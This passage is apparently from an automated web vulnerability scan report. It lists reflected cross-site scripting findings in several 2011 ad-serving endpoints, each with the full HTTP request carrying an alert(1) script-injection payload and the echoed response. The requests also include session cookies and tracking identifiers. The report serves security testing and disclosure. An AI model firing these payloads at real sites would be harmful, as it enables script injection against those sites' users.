Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

4.80. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 20743<script>alert(1)</script>2dc6e370893 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269720743<script>alert(1)</script>2dc6e370893?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYoNJIo0ZD9h4gSR2t6eX%2Bx%2FvwBCsGtyeY2n2TujHgBvTG%2BOKQ4qYoHHIwCcAEMBdNBHdKy17BavWQ9ZY77OrEDINIg1XDOObQOMHgCjJhYvvPUetd3CRKpcfmSZlq5gkiP6%2BTF%2B9H%2BYUa1jLmSW036QqX1%2BmfKP6Ns3zY8yzQBi7s3J7OHh4jvaxE5RmaKbXB4kqguFLGpV9pfqzKR2k0rtnngbgUsbdqym9abDOQa21stM%2BZ904IVzmE7JGYsst5yCLj41ykxWGUwv5bBOElWhM5XZAX9%2FMFIAF1JUSrh%2FiP4PV6Aw%3D%3D"; vsd=0@1@4dcaa3a0@d.xp1.ru4.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Thu, 12 May 2011 11:41:23 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269720743<script>alert(1)</script>2dc6e370893

4.81. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 4c3ea<script>alert(1)</script>9e43e26b8da was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=1517562&pid=8857684c3ea<script>alert(1)</script>9e43e26b8da&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:57 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2951

           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>


                                           java.lang.NumberFormatException: For input string: "8857684c3ea<script>alert(1)</script>9e43e26b8da"


                                                           </head>
...[SNIP]...

4.82. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 2ebb1--><script>alert(1)</script>46c8034e10 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=15175622ebb1--><script>alert(1)</script>46c8034e10&pid=885768&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:46 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3512

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>46c8034e10" -->
...[SNIP]...

4.83. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adsonar.com
Path:	/adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 7aee0--><script>alert(1)</script>b7befdbe7d1 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=1517562&pid=885768&ps=-17aee0--><script>alert(1)</script>b7befdbe7d1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:08 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3954

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <script>alert(1)</script>b7befdbe7d1" -->

...[SNIP]...

4.84. http://ads1.revenue.net/j [r_num parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads1.revenue.net
Path:	/j

Issue detail

The value of the r_num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773cd'%3balert(1)//8a6389b8181 was submitted in the r_num parameter. This input was echoed as 773cd';alert(1)//8a6389b8181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537773cd'%3balert(1)//8a6389b8181 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:54:57 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CACl2OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzc3M2NkJzthbGVydCgxKS8vOGE2Mzg5YjgxOFgGDDowOjEzMDUyNDQ0OTc6MbABBDAxMjk3Oi0pBAAHMTMwNTIwMTI5NxEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 359

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');

document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/227245/index.html?O_R_NUM=58437537773cd';alert(1)//8a6389b8181&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169&">
...[SNIP]...

4.85. http://ads1.revenue.net/j [site_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads1.revenue.net
Path:	/j

Issue detail

The value of the site_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2f3e'%3balert(1)//3c32c462e94 was submitted in the site_id parameter. This input was echoed as a2f3e';alert(1)//3c32c462e94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /j?site_id=12169a2f3e'%3balert(1)//3c32c462e94&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:54:56 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CADt2OjE6MToxMjE2OWEyZjNlJzthbGVydCgxKS8vM2MzMmM0NjJlOTQ6MjI3MjQ1OjM0NDA6NTg0Mzc1Mzc6MTowOjEzMDUyNDQ0OTY6MbABBDAxMjk2Oi0pBAAHMTMwNTIwMTI5NhEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 359

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');

document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/227245/index.html?O_R_NUM=58437537&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169a2f3e';alert(1)//3c32c462e94&">
...[SNIP]...

4.86. http://adserving.cpxinteractive.com/st [ad_size parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserving.cpxinteractive.com
Path:	/st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abf19'-alert(1)-'e26e9738d4e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=pop&ad_size=0x0abf19'-alert(1)-'e26e9738d4e&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

4.87. http://adserving.cpxinteractive.com/st [pop_frequency parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserving.cpxinteractive.com
Path:	/st

Issue detail

The value of the pop_frequency request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2af3e'-alert(1)-'acaaadb8c74 was submitted in the pop_frequency parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=02af3e'-alert(1)-'acaaadb8c74&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:12 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=02af3e'-alert(1)-'acaaadb8c74&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kG
...[SNIP]...

4.88. http://adserving.cpxinteractive.com/st [pop_times parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserving.cpxinteractive.com
Path:	/st

Issue detail

The value of the pop_times request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 415c8'-alert(1)-'0163bb86c01 was submitted in the pop_times parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1415c8'-alert(1)-'0163bb86c01&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:03:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:03:04 GMT
Content-Length: 733

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1415c8'-alert(1)-'0163bb86c01&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pR
...[SNIP]...

4.89. http://adserving.cpxinteractive.com/st [section parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://adserving.cpxinteractive.com
Path:	/st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ae4f'-alert(1)-'10d8742ce91 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /st?ad_type=pop&ad_size=0x0&section=17487132ae4f'-alert(1)-'10d8742ce91&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:42 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:02:42 GMT
Content-Length: 733

